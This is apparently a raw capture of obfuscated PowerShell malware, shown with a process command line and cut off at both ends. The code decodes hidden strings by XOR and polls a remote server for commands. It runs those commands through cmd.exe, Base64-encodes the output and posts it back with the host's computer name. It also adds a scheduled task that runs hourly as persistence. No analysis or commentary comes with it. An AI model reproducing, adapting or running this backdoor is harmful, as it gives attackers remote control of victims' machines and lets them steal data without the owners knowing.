Get-Random -Maximum 60;$OURFvRexTaeE23zV = $OURFvRexTaeE23zV+5;start-sleep -seconds $OURFvRexTaeE23zV;continue;}$AGDFmtT = $F09ffIubQJm.StatusCode;$CGDqIISmGvhx84xp = 'aB1L';$Z3PnDkPyrJM73T01 = 'IOk1';$Z3PnDkPyrJM73T01 = [System.Text.Encoding]::UTF8.GetBytes($Z3PnDkPyrJM73T01);$Z3PnDkPyrJM73T01[0] = 9069 -bxor 8983;$Z3PnDkPyrJM73T01[1] = 26507 -bxor 26611;$Z3PnDkPyrJM73T01[2] = 28065 -bxor 28099;$Z3PnDkPyrJM73T01[3] = 19950 -bxor 19860;$CGDqIISmGvhx84xp = [System.Text.Encoding]::UTF8.GetString($Z3PnDkPyrJM73T01);$R4db3ayUHUw6A = $CGDqIISmGvhx84xp;$sr1olbnmchzR = '3HjQh';$BmOthTTBpzx601 = 'DSc4W';$BmOthTTBpzx601 = [System.Text.Encoding]::UTF8.GetBytes($BmOthTTBpzx601);$BmOthTTBpzx601[0] = 11248 -bxor 11139;$BmOthTTBpzx601[1] = 26060 -bxor 26040;$BmOthTTBpzx601[2] = 5138 -bxor 5235;$BmOthTTBpzx601[3] = 50639 -bxor 50621;$BmOthTTBpzx601[4] = 40904 -bxor 40892;$sr1olbnmchzR = [System.Text.Encoding]::UTF8.GetString($BmOthTTBpzx601);$gha9dupC = $sr1olbnmchzR;$ud3JSBmy = '7WSFDu';$laADOozsqXRnUEKX01 = 'zdl0r0';$laADOozsqXRnUEKX01 = [System.Text.Encoding]::UTF8.GetBytes($laADOozsqXRnUEKX01);$laADOozsqXRnUEKX01[0] = 1291 -bxor 1378;$laADOozsqXRnUEKX01[1] = 18218 -bxor 18253;$laADOozsqXRnUEKX01[2] = 33393 -bxor 33311;$laADOozsqXRnUEKX01[3] = 25622 -bxor 25721;$laADOozsqXRnUEKX01[4] = 1288 -bxor 1402;$laADOozsqXRnUEKX01[5] = 4445 -bxor 4408;$ud3JSBmy = [System.Text.Encoding]::UTF8.GetString($laADOozsqXRnUEKX01);$GdD5nwImmlfb = $ud3JSBmy;If ($AGDFmtT -eq 200){$x1XuBfdP = New-Object System.IO.StreamReader $F09ffIubQJm.GetResponseStream();$xYlVKzM=$x1XuBfdP.ReadToEnd();if (!$xYlVKzM.Contains('Fail')){if ($xYlVKzM.Contains($R4db3ayUHUw6A)){$INTZ_4FIYL = $xYlVKzM.Substring(16);$aSzFooViwhHMOS = 'Qe6gShw2HEk48NuJdH08FFLNZ9SDUu';$QmtbPoE501 = 'iXit2bA102BXNLHDtLO9qEgZ18C8ml';$QmtbPoE501 = [System.Text.Encoding]::UTF8.GetBytes($QmtbPoE501);$QmtbPoE501[0] = 42900 -bxor 42976;$QmtbPoE501[1] = 1496 -bxor 1441;$QmtbPoE501[2] = 63438 -bxor 63422;$QmtbPoE501[3] = 45050 -bxor 44959;$QmtbPoE501[4] = 56917 -bxor 56936;$QmtbPoE501[5] = 522 -bxor 632;$QmtbPoE501[6] = 4611 -bxor 4710;$QmtbPoE501[7] = 16552 -bxor 16603;$QmtbPoE501[8] = 18031 -bxor 17946;$QmtbPoE501[9] = 24549 -bxor 24457;$QmtbPoE501[10] = 65415 -bxor 65523;$QmtbPoE501[11] = 53065 -bxor 53103;$QmtbPoE501[12] = 56 -bxor 92;$QmtbPoE501[13] = 3692 -bxor 3589;$QmtbPoE501[14] = 16896 -bxor 17010;$QmtbPoE501[15] = 32257 -bxor 32356;$QmtbPoE501[16] = 34225 -bxor 34258;$QmtbPoE501[17] = 23229 -bxor 23241;$QmtbPoE501[18] = 58075 -bxor 58034;$QmtbPoE501[19] = 874 -bxor 773;$QmtbPoE501[20] = 18856 -bxor 18886;$QmtbPoE501[21] = 14808 -bxor 14821;$QmtbPoE501[22] = 13100 -bxor 13151;$QmtbPoE501[23] = 32024 -bxor 32125;$QmtbPoE501[24] = 48573 -bxor 48595;$QmtbPoE501[25] = 29557 -bxor 29457;$QmtbPoE501[26] = 35754 -bxor 35724;$QmtbPoE501[27] = 18256 -bxor 18233;$QmtbPoE501[28] = 10302 -bxor 10330;$QmtbPoE501[29] = 31470 -bxor 31443;$aSzFooViwhHMOS = [System.Text.Encoding]::UTF8.GetString($QmtbPoE501);$Ucwy0 = $aSzFooViwhHMOS;$aerNl = 'KfG0B';$avSeb2v01 = '21Oa4';$avSeb2v01 = [System.Text.Encoding]::UTF8.GetBytes($avSeb2v01);$avSeb2v01[0] = 26583 -bxor 26547;$avSeb2v01[1] = 13113 -bxor 13144;$avSeb2v01[2] = 56692 -bxor 56576;$avSeb2v01[3] = 45665 -bxor 45568;$avSeb2v01[4] = 50960 -bxor 50989;$aerNl = [System.Text.Encoding]::UTF8.GetString($avSeb2v01);$RrQmsQ = $aerNl;$HCp0q = S54m3xeK($Ucwy0 + $SG6M0ouk2cQUfpHV);$kwMplBvRq2zt = $nh8ZPuNg4pK3aOp + $HCp0q;if ($INTZ_4FIYL.Contains($gha9dupC)){cmd.exe /c $INTZ_4FIYL;$Zcg1A0Ue7OSiFQKP = 'M0';$TwnAoLGHUy01 = 'Ja';$TwnAoLGHUy01 = [System.Text.Encoding]::UTF8.GetBytes($TwnAoLGHUy01);$TwnAoLGHUy01[0] = 49887 -bxor 49808;$TwnAoLGHUy01[1] = 17974 -bxor 18045;$Zcg1A0Ue7OSiFQKP = [System.Text.Encoding]::UTF8.GetString($TwnAoLGHUy01);$BK7qm = $Zcg1A0Ue7OSiFQKP;} elseif($INTZ_4FIYL.Contains($GdD5nwImmlfb)){$INTZ_4FIYL = $INTZ_4FIYL.Substring(7);cmd.exe /c $INTZ_4FIYL;$wq95SC = 'alz2ozVEx';$SSe4s9RT4FU301 = '7VbvRmaFz';$SSe4s9RT4FU301 = [System.Text.Encoding]::UTF8.GetBytes($SSe4s9RT4FU301);$SSe4s9RT4FU301[0] = 29420 -bxor 29347;$SSe4s9RT4FU301[1] = 5355 -bxor 5280;$SSe4s9RT4FU301[2] = 2532 -bxor 2491;$SSe4s9RT4FU301[3] = 10724 -bxor 10669;$SSe4s9RT4FU301[4] = 42947 -bxor 42916;$SSe4s9RT4FU301[5] = 33012 -bxor 32922;$SSe4s9RT4FU301[6] = 37054 -bxor 37073;$SSe4s9RT4FU301[7] = 39326 -bxor 39404;$SSe4s9RT4FU301[8] = 17635 -bxor 17542;$wq95SC = [System.Text.Encoding]::UTF8.GetString($SSe4s9RT4FU301);$BK7qm = $wq95SC;} else {cmd.exe /c $INTZ_4FIYL > $jW3dX;$BK7qm = [System.IO.File]::ReadAllText($jW3dX);}$ltymfR5pSPm405Rv = $xYlVKzM + [Environment]::NewLine + $BK7qm;$jBTtUYqXEU_a = SWWZUOAn($ltymfR5pSPm405Rv);$rg32vOo1DUImKMD = [System.Web.HttpUtility]::UrlEncode($jBTtUYqXEU_a);$iuwAqApqcmXkAO = $RrQmsQ + $rg32vOo1DUImKMD;}}}$F09ffIubQJm.Close();if ($kwMplBvRq2zt -ne ''){LuXhxzm2KtHSmTxS $kwMplBvRq2zt $iuwAqApqcmXkAO;}$OURFvRexTaeE23zV = Get-Random -Maximum 15;$OURFvRexTaeE23zV = $OURFvRexTaeE23zV+5;start-sleep -seconds $OURFvRexTaeE23zV;}}HpWPuNxj;
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ElksyKqgq = 'NzXwsdKH4mhsJlZ';$dS1me690PeF01 = 'yPY0RHrDa5fVEbN';$dS1me690PeF01 = [System.Text.Encoding]::UTF8.GetBytes($dS1me690PeF01);$dS1me690PeF01[0] = 33312 -bxor 33350;$dS1me690PeF01[1] = 5894 -bxor 5980;$dS1me690PeF01[2] = 53821 -bxor 53844;$dS1me690PeF01[3] = 24611 -bxor 24676;$dS1me690PeF01[4] = 2604 -bxor 2585;$dS1me690PeF01[5] = 43144 -bxor 43234;$dS1me690PeF01[6] = 41855 -bxor 41806;$dS1me690PeF01[7] = 41245 -bxor 41330;$dS1me690PeF01[8] = 43527 -bxor 43583;$dS1me690PeF01[9] = 53707 -bxor 53667;$dS1me690PeF01[10] = 61928 -bxor 61853;$dS1me690PeF01[11] = 4996 -bxor 5066;$dS1me690PeF01[12] = 27428 -bxor 27470;$dS1me690PeF01[13] = 54354 -bxor 54282;$dS1me690PeF01[14] = 35537 -bxor 35463;$ElksyKqgq = [System.Text.Encoding]::UTF8.GetString($dS1me690PeF01);$qPaINTp8mf0 = $ElksyKqgq;function whKgZ($yTCpQOfKack, $xYlVKzM){$rCjLJasyf0m7 = [System.Text.Encoding]::UTF8;$CRABmSSX_ = $rCjLJasyf0m7.GetBytes($yTCpQOfKack);$LyZoc7Ykbs = $rCjLJasyf0m7.GetBytes($xYlVKzM);for ($i=0; $i -lt $LyZoc7Ykbs.length;){for ($j =0; $j -lt $CRABmSSX_.length; $j++){$LyZoc7Ykbs[$i] = $LyZoc7Ykbs[$i] -bxor $CRABmSSX_[$j];$i++;if ($i -ge $LyZoc7Ykbs.length){$j = $CRABmSSX_.length;}}}$ySwqdHx8Dh = [System.Convert]::ToBase64String($LyZoc7Ykbs);$ySwqdHx8Dh = $ySwqdHx8Dh.replace('+', '-').replace('/', '_').replace('=', '');return $ySwqdHx8Dh;}function mdkinhmi0xs63xl($Ube5aXEYlM7){return (-join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) \| Get-Random -Count $Ube5aXEYlM7 \| % {[char]$_}));}function S54m3xeK($nmLUVYfYimhN){$BMxL1 = mdkinhmi0xs63xl(5);$RznphCP = mdkinhmi0xs63xl(7);$xwhlQbRfEg_wwKF = mdkinhmi0xs63xl(16);$V4yUZ8nNguf7 = whKgZ $xwhlQbRfEg_wwKF $nmLUVYfYimhN;$BK7qm = '';$eWPzX = Get-Random -Maximum 5;for ($i = 0; $i -lt $eWPzX; $i++){$Bz6ES = Get-Random -Maximum 10 -Minimum 1;if (($Bz6ES -eq 5) -or ($Bz6ES -eq 7)){$Bz6ES--;}$HETSfJ99FEVe0 = Get-Random -Maximum 16 -Minimum 5;$NHWxXYSzsX6ki8zD = mdkinhmi0xs63xl($Bz6ES);$TM9GFOCA7 = mdkinhmi0xs63xl($HETSfJ99FEVe0);if ($BK7qm -eq ''){$BK7qm = $BK7qm + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;} else {$BK7qm = $BK7qm + '&' + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;}}if ($BK7qm -eq ''){$BK7qm = $BK7qm + $BMxL1 + '=' + $xwhlQbRfEg_wwKF + '&' + $RznphCP + '=' + $V4yUZ8nNguf7;} else {$BK7qm = $BK7qm + '&' + $BMxL1 + '=' + $xwhlQbRfEg_wwKF + '&' + $RznphCP + '=' + $V4yUZ8nNguf7;}$QQ3mvz = Get-Random -Maximum 3;for ($i = 0; $i -lt $QQ3mvz; $i++){$Bz6ES = Get-Random -Maximum 10 -Minimum 1;if (($Bz6ES -eq 5) -or ($Bz6ES -eq 7)){$Bz6ES--;}$HETSfJ99FEVe0 = Get-Random -Maximum 12 -Minimum 1;$NHWxXYSzsX6ki8zD = mdkinhmi0xs63xl($Bz6ES);$TM9GFOCA7 = mdkinhmi0xs63xl($HETSfJ99FEVe0);if ($BK7qm -eq ''){$BK7qm = $BK7qm + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;} else {$BK7qm = $BK7qm + '&' + $NHWxXYSzsX6ki8zD + '=' + $TM9GFOCA7;}}return '?' + $BK7qm;}$T0c4GnRZL0 = 'o8DP9rn5zE1kaF';$VqRvR7u01 = 'rbbyGdyuIHnQEO';$VqRvR7u01 = [System.Text.Encoding]::UTF8.GetBytes($VqRvR7u01);$VqRvR7u01[0] = 3928 -bxor 3898;$VqRvR7u01[1] = 11945 -bxor 11931;$VqRvR7u01[2] = 21808 -bxor 21873;$VqRvR7u01[3] = 25530 -bxor 25550;$VqRvR7u01[4] = 23678 -bxor 23601;$VqRvR7u01[5] = 48796 -bxor 48876;$VqRvR7u01[6] = 55455 -bxor 55513;$VqRvR7u01[7] = 65244 -bxor 65202;$VqRvR7u01[8] = 23263 -bxor 23189;$VqRvR7u01[9] = 38044 -bxor 38133;$VqRvR7u01[10] = 10093 -bxor 10027;$VqRvR7u01[11] = 62542 -bxor 62470;$VqRvR7u01[12] = 48053 -bxor 48124;$VqRvR7u01[13] = 45810 -bxor 45719;$T0c4GnRZL0 = [System.Text.Encoding]::UTF8.GetString($VqRvR7u01);$ANNaEKn24PF = $T0c4GnRZL0;function SWWZUOAn($yPvXZCD3UDvC_1I7){return [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($yPvXZCD3UDvC_1I7));}function LiYMh74($yPvXZCD3UDvC_1I7){$b64str = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($yPvXZCD3UDvC_1I7));return $b64str.replace('+', '-').replace('/', '_').replace('=', '');}function LuXhxzm2KtHSmTxS($OOa9P1cGqThqWwO3, $WnI_R){$SUZgLOy = [System.Text.Encoding]::UTF8.GetBytes($WnI_R);[System.Net.HttpWebRequest] $hcAiTwqCt9PwT = [System.Net.WebRequest]::Create($OOa9P1cGqThqWwO3);$U_NUkepb71Q = 's1lb';$AXQigUrD6uwklW01 = 'cc3g';$AXQigUrD6uwklW01 = [System.Text.Encoding]::UTF8.GetBytes($AXQigUrD6uwklW01);$AXQigUrD6uwklW01[0] = 28594 -bxor 28642;$AXQigUrD6uwklW01[1] = 7544 -bxor 7479;$AXQigUrD6uwklW01[2] = 14992 -bxor 15043;$AXQigUrD6uwklW01[3] = 65336 -bxor 65388;$U_NUkepb71Q = [System.Text.Encoding]::UTF8.GetString($AXQigUrD6uwklW01);$hcAiTwqCt9PwT.Method = $U_NUkepb71Q;$frNzen = 'x0ymi50wOBCHMa0vesHUk0hjaQq9yd1VV';$S9ybl01 = '7ZX6LiBugDgzhtuC3mTvXB60vUCC2aeFY';$S9ybl01 = [System.Text.Encoding]::UTF8.GetBytes($S9ybl01);$S9ybl01[0] = 46122 -bxor 46155;$S9ybl01[1] = 23347 -bxor 23363;$S9ybl01[2] = 58757 -bxor 58869;$S9ybl01[3] = 51395 -bxor 51375;$S9ybl01[4] = 9968 -bxor 9881;$S9ybl01[5] = 37098 -bxor 37001;$S9ybl01[6] = 55070 -bxor 55167;$S9ybl01[7] = 48095 -bxor 48043;$S9ybl01[8] = 48069 -bxor 48044;$S9ybl01[9] = 29814 -bxor 29721;$S9ybl01[10] = 49656 -bxor 49558;$S9ybl01[11] = 10102 -bxor 10073;$S9ybl01[12] = 51918 -bxor 51894;$S9ybl01[13] = 451 -bxor 494;$S9ybl01[14] = 20934 -bxor 20913;$S9ybl01[15] = 52408 -bxor 52431;$S9ybl01[16] = 40458 -bxor 40573;$S9ybl01[17] = 3704 -bxor 3669;$S9ybl01[18] = 8554 -bxor 8460;$S9ybl01[19] = 42369 -bxor 42478;$S9ybl01[20] = 2424 -bxor 2314;$S9ybl01[21] = 6571 -bxor 6598;$S9ybl01[22] = 28974 -bxor 28931;$S9ybl01[23] = 37068 -bxor 37049;$S9ybl01[24] = 9358 -bxor 9468;$S9ybl01[25] = 51114 -bxor 51142;$S9ybl01[26] = 10436 -bxor 10401;$S9ybl01[27] = 27496 -bxor 27398;$S9ybl01[28] = 20560 -bxor 20531;$S9ybl01[29] = 47641 -bxor 47734;$S9ybl01[30] = 43655 -bxor 43747;$S9ybl01[31] = 40920 -bxor 40893;$S9ybl01[32] = 7073 -bxor 7109;$frNzen = [System.Text.Encoding]::UTF8.GetString($S9ybl01);$hcAiTwqCt9PwT.ContentType = $frNzen;$hcAiTwqCt9PwT.ContentLength = $SUZgLOy.Length;try{$eLj81Oe = $hcAiTwqCt9PwT.GetRequestStream();$eLj81Oe.Write($SUZgLOy, 0, $SUZgLOy.Length);$eLj81Oe.Flush();$eLj81Oe.Close();[System.Net.HttpWebResponse] $jUYS0IdI = $hcAiTwqCt9PwT.GetResponse();$kHx3AO8E = New-Object System.IO.StreamReader($jUYS0IdI.GetResponseStream());$BK7qm = $kHx3AO8E.ReadToEnd();return $BK7qm;} catch {return '';}}function HsnmKyIW4V($wj_uC5xvtcOmXJ){$arEdmGvRqoSs = '3MAHqhnlu03NTncqN8SgQh5sFjssvVNpZzTs6GSqD4Kh2t6AH';$YGF4zEt9ImmOq8V01 = 'uv0m16W4c6b0q05fjNAIs75vvYfptNUZSy2FmYzauDl06kKtb';$YGF4zEt9ImmOq8V01 = [System.Text.Encoding]::UTF8.GetBytes($YGF4zEt9ImmOq8V01);$YGF4zEt9ImmOq8V01[0] = 441 -bxor 468;$YGF4zEt9ImmOq8V01[1] = 30585 -bxor 30474;$YGF4zEt9ImmOq8V01[2] = 36323 -bxor 36235;$YGF4zEt9ImmOq8V01[3] = 37198 -bxor 37178;$YGF4zEt9ImmOq8V01[4] = 40078 -bxor 40175;$YGF4zEt9ImmOq8V01[5] = 38586 -bxor 38554;$YGF4zEt9ImmOq8V01[6] = 60840 -bxor 60864;$YGF4zEt9ImmOq8V01[7] = 46333 -bxor 46217;$YGF4zEt9ImmOq8V01[8] = 65258 -bxor 65182;$YGF4zEt9ImmOq8V01[9] = 24688 -bxor 24576;$YGF4zEt9ImmOq8V01[10] = 28202 -bxor 28176;$YGF4zEt9ImmOq8V01[11] = 21153 -bxor 21134;$YGF4zEt9ImmOq8V01[12] = 19285 -bxor 19322;$YGF4zEt9ImmOq8V01[13] = 17638 -bxor 17558;$YGF4zEt9ImmOq8V01[14] = 23888 -bxor 23845;$YGF4zEt9ImmOq8V01[15] = 64778 -bxor 64871;$YGF4zEt9ImmOq8V01[16] = 28327 -bxor 28375;$YGF4zEt9ImmOq8V01[17] = 47484 -bxor 47377;$YGF4zEt9ImmOq8V01[18] = 36253 -bxor 36338;$YGF4zEt9ImmOq8V01[19] = 24347 -bxor 24431;$YGF4zEt9ImmOq8V01[20] = 18501 -bxor 18474;$YGF4zEt9ImmOq8V01[21] = 36431 -bxor 36413;$YGF4zEt9ImmOq8V01[22] = 58881 -bxor 58927;$YGF4zEt9ImmOq8V01[23] = 48386 -bxor 48492;$YGF4zEt9ImmOq8V01[24] = 30443 -bxor 30350;$YGF4zEt9ImmOq8V01[25] = 4839 -bxor 4755;$YGF4zEt9ImmOq8V01[26] = 49836 -bxor 49795;$YGF4zEt9ImmOq8V01[27] = 58161 -bxor 58196;$YGF4zEt9ImmOq8V01[28] = 11345 -bxor 11317;$YGF4zEt9ImmOq8V01[29] = 15971 -bxor 15882;$YGF4zEt9ImmOq8V01[30] = 14289 -bxor 14245;$YGF4zEt9ImmOq8V01[31] = 16163 -bxor 16204;$YGF4zEt9ImmOq8V01[32] = 41830 -bxor 41748;$YGF4zEt9ImmOq8V01[33] = 60433 -bxor 60478;$YGF4zEt9ImmOq8V01[34] = 49169 -bxor 49250;$YGF4zEt9ImmOq8V01[35] = 43694 -bxor 43715;$YGF4zEt9ImmOq8V01[36] = 38532 -bxor 38629;$YGF4zEt9ImmOq8V01[37] = 54818 -bxor 54864;$YGF4zEt9ImmOq8V01[38] = 10972 -bxor 10920;$YGF4zEt9ImmOq8V01[39] = 12822 -bxor 12921;$YGF4zEt9ImmOq8V01[40] = 32341 -bxor 32293;$YGF4zEt9ImmOq8V01[41] = 22378 -bxor 22302;$YGF4zEt9ImmOq8V01[42] = 29039 -bxor 28934;$YGF4zEt9ImmOq8V01[43] = 41069 -bxor 40962;$YGF4zEt9ImmOq8V01[44] = 31435 -bxor 31397;$YGF4zEt9ImmOq8V01[45] = 5356 -bxor 5314;$YGF4zEt9ImmOq8V01[46] = 53862 -bxor 53782;$YGF4zEt9ImmOq8V01[47] = 42702 -bxor 42662;$YGF4zEt9ImmOq8V01[48] = 26219 -bxor 26139;$arEdmGvRqoSs = [System.Text.Encoding]::UTF8.GetString($YGF4zEt9ImmOq8V01);$LNCKYBeJkQ = $arEdmGvRqoSs;schtasks /create /sc minute /mo 60 /tn $wj_uC5xvtcOmXJ /tr $LNCKYBeJkQ /f;}Add-Type -AssemblyName System.Web;function HpWPuNxj(){$aDqmdv69z2D = 'CcMtwBVs1FrdaHKvuAy0O7lwikCDP1blIoiPRVCAKE4JINSMu20WWTKlb';$h0Osuy3sf0um4xob01 = 'KxYDx7KGK60vfXbO9SWmMk39bDwMEsaaIDF9KmGMhFdbv83lteymEPSNS';$h0Osuy3sf0um4xob01 = [System.Text.Encoding]::UTF8.GetBytes($h0Osuy3sf0um4xob01);$h0Osuy3sf0um4xob01[0] = 40925 -bxor 40885;$h0Osuy3sf0um4xob01[1] = 25917 -bxor 25929;$h0Osuy3sf0um4xob01[2] = 10834 -bxor 10790;$h0Osuy3sf0um4xob01[3] = 25035 -bxor 25019;$h0Osuy3sf0um4xob01[4] = 55363 -bxor 55417;$h0Osuy3sf0um4xob01[5] = 63115 -bxor 63140;$h0Osuy3sf0um4xob01[6] = 44806 -bxor 44841;$h0Osuy3sf0um4xob01[7] = 61613 -bxor 61638;$h0Osuy3sf0um4xob01[8] = 1647 -bxor 1546;$h0Osuy3sf0um4xob01[9] = 8875 -bxor 8901;$h0Osuy3sf0um4xob01[10] = 32648 -bxor 32764;$h0Osuy3sf0um4xob01[11] = 20987 -bxor 20876;$h0Osuy3sf0um4xob01[12] = 21901 -bxor 21996;$h0Osuy3sf0um4xob01[13] = 50279 -bxor 50195;$h0Osuy3sf0um4xob01[14] = 9552 -bxor 9525;$h0Osuy3sf0um4xob01[15] = 9180 -bxor 9134;$h0Osuy3sf0um4xob01[16] = 32380 -bxor 32338;$h0Osuy3sf0um4xob01[17] = 9253 -bxor 9286;$h0Osuy3sf0um4xob01[18] = 51020 -bxor 50978;$h0Osuy3sf0um4xob01[19] = 40144 -bxor 40191;$h0Osuy3sf0um4xob01[20] = 14537 -bxor 14506;$h0Osuy3sf0um4xob01[21] = 43110 -bxor 43015;$h0Osuy3sf0um4xob01[22] = 12761 -bxor 12730;$h0Osuy3sf0um4xob01[23] = 23564 -bxor 23652;$h0Osuy3sf0um4xob01[24] = 42886 -bxor 42979;$h0Osuy3sf0um4xob01[25] = 28120 -bxor 28075;$h0Osuy3sf0um4xob01[26] = 945 -bxor 926;$h0Osuy3sf0um4xob01[27] = 63474 -bxor 63377;$h0Osuy3sf0um4xob01[28] = 8366 -bxor 8399;$h0Osuy3sf0um4xob01[29] = 63486 -bxor 63389;$h0Osuy3sf0um4xob01[30] = 58761 -bxor 58849;$h0Osuy3sf0um4xob01[31] = 30054 -bxor 29955;$h0Osuy3sf0um4xob01[32] = 9022 -bxor 9037;$h0Osuy3sf0um4xob01[33] = 3921 -bxor 3854;$h0Osuy3sf0um4xob01[34] = 7213 -bxor 7257;$h0Osuy3sf0um4xob01[35] = 34342 -bxor 34371;$h0Osuy3sf0um4xob01[36] = 44059 -bxor 44150;$h0Osuy3sf0um4xob01[37] = 12710 -bxor 12758;$h0Osuy3sf0um4xob01[38] = 3611 -bxor 3703;$h0Osuy3sf0um4xob01[39] = 38279 -bxor 38374;$h0Osuy3sf0um4xob01[40] = 10949 -bxor 10929;$h0Osuy3sf0um4xob01[41] = 62189 -bxor 62088;$h0Osuy3sf0um4xob01[42] = 65064 -bxor 65031;$h0Osuy3sf0um4xob01[43] = 19120 -bxor 19141;$h0Osuy3sf0um4xob01[44] = 19944 -bxor 19867;$h0Osuy3sf0um4xob01[45] = 39289 -bxor 39196;$h0Osuy3sf0um4xob01[46] = 62317 -bxor 62239;$h0Osuy3sf0um4xob01[47] = 46715 -bxor 46676;$h0Osuy3sf0um4xob01[48] = 31947 -bxor 31906;$h0Osuy3sf0um4xob01[49] = 41223 -bxor 41321;$h0Osuy3sf0um4xob01[50] = 32964 -bxor 32928;$h0Osuy3sf0um4xob01[51] = 13877 -bxor 13904;$h0Osuy3sf0um4xob01[52] = 26292 -bxor 26316;$h0Osuy3sf0um4xob01[53] = 17762 -bxor 17740;$h0Osuy3sf0um4xob01[54] = 53838 -bxor 53822;$h0Osuy3sf0um4xob01[55] = 39672 -bxor 39568;$h0Osuy3sf0um4xob01[56] = 16701 -bxor 16717;$aDqmdv69z2D = [System.Text.Encoding]::UTF8.GetString($h0Osuy3sf0um4xob01);$nh8ZPuNg4pK3aOp = $aDqmdv69z2D;$SG6M0ouk2cQUfpHV = LiYMh74($env:COMPUTERNAME);if ($SG6M0ouk2cQUfpHV -eq ''){$rbbqyvzmbQxW5vj = 'm4JO4dFbEn3j';$jDyM0BkFGCVhyt01 = 'R5m7du2ge0PV';$jDyM0BkFGCVhyt01 = [System.Text.Encoding]::UTF8.GetBytes($jDyM0BkFGCVhyt01);$jDyM0BkFGCVhyt01[0] = 42523 -bxor 42602;$jDyM0BkFGCVhyt01[1] = 14543 -bxor 14519;$jDyM0BkFGCVhyt01[2] = 50284 -bxor 50261;$jDyM0BkFGCVhyt01[3] = 48121 -bxor 48074;$jDyM0BkFGCVhyt01[4] = 25864 -bxor 25946;$jDyM0BkFGCVhyt01[5] = 64399 -bxor 64492;$jDyM0BkFGCVhyt01[6] = 41398 -bxor 41410;$jDyM0BkFGCVhyt01[7] = 63962 -bxor 63976;$jDyM0BkFGCVhyt01[8] = 40459 -bxor 40524;$jDyM0BkFGCVhyt01[9] = 39021 -bxor 38964;$jDyM0BkFGCVhyt01[10] = 29569 -bxor 29616;$jDyM0BkFGCVhyt01[11] = 12724 -bxor 12762;$rbbqyvzmbQxW5vj = [System.Text.Encoding]::UTF8.GetString($jDyM0BkFGCVhyt01);$SG6M0ouk2cQUfpHV = $rbbqyvzmbQxW5vj;}$cL4OLMozllhTOvN0 = 'mc3xH8dj1pOYCYTMFUU';$i_yupXum9o4A01 = 'n97O4RL1O9meVciqKn9';$i_yupXum9o4A01 = [System.Text.Encoding]::UTF8.GetBytes($i_yupXum9o4A01);$i_yupXum9o4A01[0] = 25703 -bxor 25661;$i_yupXum9o4A01[1] = 24729 -bxor 24745;$i_yupXum9o4A01[2] = 43535 -bxor 43579;$i_yupXum9o4A01[3] = 39771 -bxor 39697;$i_yupXum9o4A01[4] = 2522 -bxor 2493;$i_yupXum9o4A01[5] = 10517 -bxor 10604;$i_yupXum9o4A01[6] = 20530 -bxor 20490;$i_yupXum9o4A01[7] = 19045 -bxor 18997;$i_yupXum9o4A01[8] = 39629 -bxor 39594;$i_yupXum9o4A01[9] = 10440 -bxor 10392;$i_yupXum9o4A01[10] = 6161 -bxor 6183;$i_yupXum9o4A01[11] = 24150 -bxor 24069;$i_yupXum9o4A01[12] = 9906 -bxor 9856;$i_yupXum9o4A01[13] = 18939 -bxor 18850;$i_yupXum9o4A01[14] = 2491 -bxor 2521;$i_yupXum9o4A01[15] = 41121 -bxor 41103;$i_yupXum9o4A01[16] = 15101 -bxor 15001;$i_yupXum9o4A01[17] = 61464 -bxor 61561;$i_yupXum9o4A01[18] = 53213 -bxor 53161;$cL4OLMozllhTOvN0 = [System.Text.Encoding]::UTF8.GetString($i_yupXum9o4A01);$em9ZbV = $cL4OLMozllhTOvN0;$jW3dX = $env:APPDATA + '\' + $em9ZbV;$H6Rq5fB4aky27 = 'pVhWrpfLw1HlIv2e0mKk';$hdeNFbCBu6QgOZV001 = 'maHtOIXxL4H1dpTrLhaD';$hdeNFbCBu6QgOZV001 = [System.Text.Encoding]::UTF8.GetBytes($hdeNFbCBu6QgOZV001);$hdeNFbCBu6QgOZV001[0] = 14735 -bxor 14784;$hdeNFbCBu6QgOZV001[1] = 50810 -bxor 50716;$hdeNFbCBu6QgOZV001[2] = 56841 -bxor 56943;$hdeNFbCBu6QgOZV001[3] = 2786 -bxor 2699;$hdeNFbCBu6QgOZV001[4] = 36501 -bxor 36598;$hdeNFbCBu6QgOZV001[5] = 14180 -bxor 14081;$hdeNFbCBu6QgOZV001[6] = 64650 -bxor 64726;$hdeNFbCBu6QgOZV001[7] = 26751 -bxor 26640;$hdeNFbCBu6QgOZV001[8] = 64146 -bxor 64226;$hdeNFbCBu6QgOZV001[9] = 20928 -bxor 20916;$hdeNFbCBu6QgOZV001[10] = 53051 -bxor 53074;$hdeNFbCBu6QgOZV001[11] = 47608 -bxor 47511;$hdeNFbCBu6QgOZV001[12] = 22734 -bxor 22688;$hdeNFbCBu6QgOZV001[13] = 44933 -bxor 45017;$hdeNFbCBu6QgOZV001[14] = 16707 -bxor 16694;$hdeNFbCBu6QgOZV001[15] = 16066 -bxor 16050;$hdeNFbCBu6QgOZV001[16] = 19562 -bxor 19470;$hdeNFbCBu6QgOZV001[17] = 14290 -bxor 14259;$hdeNFbCBu6QgOZV001[18] = 64053 -bxor 64065;$hdeNFbCBu6QgOZV001[19] = 52106 -bxor 52207;$H6Rq5fB4aky27 = [System.Text.Encoding]::UTF8.GetString($hdeNFbCBu6QgOZV001); $fv0na8jKt8 = $H6Rq5fB4aky27;HsnmKyIW4V($fv0na8jKt8);while ($true){$kwMplBvRq2zt = '';$b2ZuuGw = 'Auc562ufGzyBeD';$U1jgVr9t01 = 'Up7wMMVScRE5Fh';$U1jgVr9t01 = [System.Text.Encoding]::UTF8.GetBytes($U1jgVr9t01);$U1jgVr9t01[0] = 62752 -bxor 62807;$U1jgVr9t01[1] = 47460 -bxor 47405;$U1jgVr9t01[2] = 26476 -bxor 26458;$U1jgVr9t01[3] = 20905 -bxor 20952;$U1jgVr9t01[4] = 12842 -bxor 12870;$U1jgVr9t01[5] = 42712 -bxor 42729;$U1jgVr9t01[6] = 31801 -bxor 31754;$U1jgVr9t01[7] = 37246 -bxor 37199;$U1jgVr9t01[8] = 35733 -bxor 35780;$U1jgVr9t01[9] = 47302 -bxor 47348;$U1jgVr9t01[10] = 23154 -bxor 23100;$U1jgVr9t01[11] = 37942 -bxor 37980;$U1jgVr9t01[12] = 32836 -bxor 32808;$U1jgVr9t01[13] 